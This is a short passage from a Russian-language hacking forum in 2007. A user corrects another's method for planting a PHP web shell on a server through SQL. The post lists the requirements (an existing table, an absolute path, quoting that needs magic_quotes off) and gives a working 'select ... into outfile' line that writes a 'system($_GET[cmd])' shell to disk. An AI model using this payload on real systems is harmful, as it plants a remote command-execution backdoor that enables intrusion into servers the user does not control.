26.12.2007, 23:11
|
|
Banned
Регистрация: 05.12.2005
Сообщений: 982
Провел на форуме:
4839935
Репутация:
1202
|
|
Сообщение от Spyder
хм
Средствами SQL например
select <?system($_GET[cmd])?> into outfile '/путь/к/шеллу.php'
по синтаксису sql необходимым условием является:
~ указание существующей таблицы
~ абсолютный путь к файлу
~ обрамление ковычками абсолютного пути к файлу, что как следствие требует magic_quotes=OFF либо stripslashes запроса
.. и тот кто реально хоть раз грузил так шелл, должен был это знать...
PHP код:
select '<?system($_GET[cmd])?>' from table_name_blaaaahh into outfile '/путь/к/шеллу.php'
|
|
|